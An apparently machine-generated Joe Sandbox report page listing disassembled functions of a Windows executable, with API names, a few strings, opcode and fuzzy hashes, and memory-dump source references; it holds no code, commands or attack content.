                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                          • Instruction ID: 79c3d1495c13093d20d6bd13ba0380e680939898318ed4409c7932642d93c465
                                                                                          • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                          • Instruction Fuzzy Hash: 9DF0C222A0C68295FF648B31E84237927A1EB54BB8F484334D73C812D4DF3CD8A5E700
                                                                                          Function 00007FF6373CD94C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 4292702814-0
                                                                                          • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                          • Instruction ID: 3c8264670d27d165478b57702ad804beb66fcfdb2c1a3f2fa76d2bdb41466b7a
                                                                                          • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                          • Instruction Fuzzy Hash: F7F0A014F2D32744FF5467B168103B422905F847A2F081670ED6FD63C2DE3CE480B210

                                                                                          Non-executed Functions

                                                                                          Function 00007FF63739C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                          • API String ID: 2659423929-3508440684
                                                                                          • Opcode ID: f5475b7cf15a27302d6427b54aafe2ac7804029fc4e66d1f1335c910ad8cb0ce
                                                                                          • Instruction ID: e0c8f0aeec91020eca680c5fe83cc996c2d1126cb95e4de0af97da3f11fadc52
                                                                                          • Opcode Fuzzy Hash: f5475b7cf15a27302d6427b54aafe2ac7804029fc4e66d1f1335c910ad8cb0ce
                                                                                          • Instruction Fuzzy Hash: 7A62AC62F1C68285FB009B74D8453FD23A1AB967A4F504231DA6D97BEADF3CE585E300
                                                                                          Function 00007FF6373AF180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                          • String ID: %ls$%s: %s
                                                                                          • API String ID: 2539828978-2259941744
                                                                                          • Opcode ID: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                                                                                          • Instruction ID: 5f68047e2a1980207d15610a6007e11116830cb1834a2893270c2f0d1cbef37e
                                                                                          • Opcode Fuzzy Hash: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                                                                                          • Instruction Fuzzy Hash: 7DB2B262E1CA8781FA509B25D4552FEA351EFDA7D0F104236EA9D83BE6EE3CE540D700
                                                                                          Function 00007FF6373D2550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 1759834784-2761157908
                                                                                          • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                          • Instruction ID: 77bca851e2c0ce71f05e58e711b7c0c751bba9bda0e638e7b44ad9dce1b8126a
                                                                                          • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                          • Instruction Fuzzy Hash: 67B2D4B2E0C2928AF7258F69D8407FD37A5FF88788F505135DA1A97B84DF38E9049B05
                                                                                          Function 00007FF6373A1A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                          • String ID: rtmp
                                                                                          • API String ID: 3587137053-870060881
                                                                                          • Opcode ID: 9a6b4eb23280b2374bd97dfab45b851d954896022b1567a2b07181d6df3ed98a
                                                                                          • Instruction ID: d8d260b9a1c6be9946145e6717f91a2a17cbe1b731b926766c54ac316766cec3
                                                                                          • Opcode Fuzzy Hash: 9a6b4eb23280b2374bd97dfab45b851d954896022b1567a2b07181d6df3ed98a
                                                                                          • Instruction Fuzzy Hash: 6EF1CE22B0CA8281FE50DB65D8811FE67B1EB957C4F501236EA4E87BA9DF3CE584D740
                                                                                          Function 00007FF6373A5B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1693479884-0
                                                                                          • Opcode ID: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
                                                                                          • Instruction ID: a08b61b83b9fc1585f73dc49012ab8d42bf8432a2754495906cd041f208761e4
                                                                                          • Opcode Fuzzy Hash: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
                                                                                          • Instruction Fuzzy Hash: 10A1B062F1DB5284FF408BBA98455BC2331AF99BE4B145235DE6D97BD9DE3CE081A300
                                                                                          Function 00007FF6373C3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3140674995-0
                                                                                          • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                          • Instruction ID: ca2818ce7cf43c96ecd5222ab0497fdda084d1b192ae8af5de6994890b1288dc
                                                                                          • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                          • Instruction Fuzzy Hash: 2F315076A08B828AFB609F64E8903ED7370FB88744F444439DA4D87B98DF78D548D715
                                                                                          Function 00007FF6373C76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1239891234-0
                                                                                          • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                          • Instruction ID: d1bcff53e0f30832420540602392b23fc18d42be8e8d8ed54c7751cb17c845ab
                                                                                          • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                          • Instruction Fuzzy Hash: 10316036A08B9286EB60CF25E8402EE73A0FB88754F540135EE8D83BA9DF3CD545DB00
                                                                                          Function 00007FF637391AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3668304517-0
                                                                                          • Opcode ID: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
                                                                                          • Instruction ID: 8dbc7382053a7953246bc49e9c00f7a210a2b4cf14d9f75cd79497a1c0088ea7
                                                                                          • Opcode Fuzzy Hash: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
                                                                                          • Instruction Fuzzy Hash: 50B1CD62F1DA8686FB109B65D8403EE2361FF9A794F405231EA5D97BA9EF3CE540D300
                                                                                          Function 00007FF6373CFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6373CFAC4
                                                                                            • Part of subcall function 00007FF6373C7934: GetCurrentProcess.KERNEL32(00007FF6373D0CCD), ref: 00007FF6373C7961
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                          • String ID: *?$.
                                                                                          • API String ID: 2518042432-3972193922
                                                                                          • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                          • Instruction ID: f96c8bedb7c771c53bddbb743af813396e6a3994464be8d1fd370aacbcd136e0
                                                                                          • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                          • Instruction Fuzzy Hash: 3651D463F18AA781FB10DF6294100B963A4FB48BD9B448532EE5D97B89DF3CD0429300
                                                                                          Function 00007FF6373D2080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 1502251526-0
                                                                                          • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                          • Instruction ID: 3a22c9765bd55e397f75363d4bf85a5dd8bdeee6aaaa6c5bdaf7189dca7b6357
                                                                                          • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                          • Instruction Fuzzy Hash: CDD1CD72B1C68687EB64CF15E1886AAB7A1FB98784F048134DB4E93B44DF3DE845DB04
                                                                                          Function 00007FF63739B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                                          • String ID:
                                                                                          • API String ID: 1365068426-0
                                                                                          • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                          • Instruction ID: 04583eb9199524e49e4fa1433258063c1b8846f03a175e26fe75b4261bdd281a
                                                                                          • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                          • Instruction Fuzzy Hash: BA01FF7160C74282F7509F26B85027A6396FF9ABC1F484134EA8D87B55CF3CE515AB05
                                                                                          Function 00007FF6373CFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .
                                                                                          • API String ID: 0-248832578
                                                                                          • Opcode ID: c6a507b225cd4218212adc004c755bbf20f968de81e7d05236a270c9e1509e97
                                                                                          • Instruction ID: 2bd1fba7244a5d69f70de64951a838fbeb25d8f6df11f3bc6c6fcbc451959523
                                                                                          • Opcode Fuzzy Hash: c6a507b225cd4218212adc004c755bbf20f968de81e7d05236a270c9e1509e97
                                                                                          • Instruction Fuzzy Hash: 7D31FB63F1C6A785F7209B36A8057B97A91AB94BE4F148735DE6C87BC9CE3CD5029300
                                                                                          Function 00007FF6373D5AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                          • String ID:
                                                                                          • API String ID: 15204871-0
                                                                                          • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                          • Instruction ID: b5a06af431262afa621b10854d7f94b6e3827954e96a6ac037f32bd0f07744ef
                                                                                          • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                          • Instruction Fuzzy Hash: AEB15D73608B898BEB15CF29C84636C7BA0FB44B48F158921DBAD877A8CF39D451D714
                                                                                          Function 00007FF6373B8DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                          • String ID:
                                                                                          • API String ID: 1061551593-0
                                                                                          • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                          • Instruction ID: 97624bd19218818bcaaddbb3de810393feb3bdddfa68ca3c33c2826e050e9e06
                                                                                          • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                          • Instruction Fuzzy Hash: 7281F876B18A1586FB20CF6AE4406AD7771FB88B88F004122DE0D97B64DF3DE549E784
                                                                                          Function 00007FF6373BA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
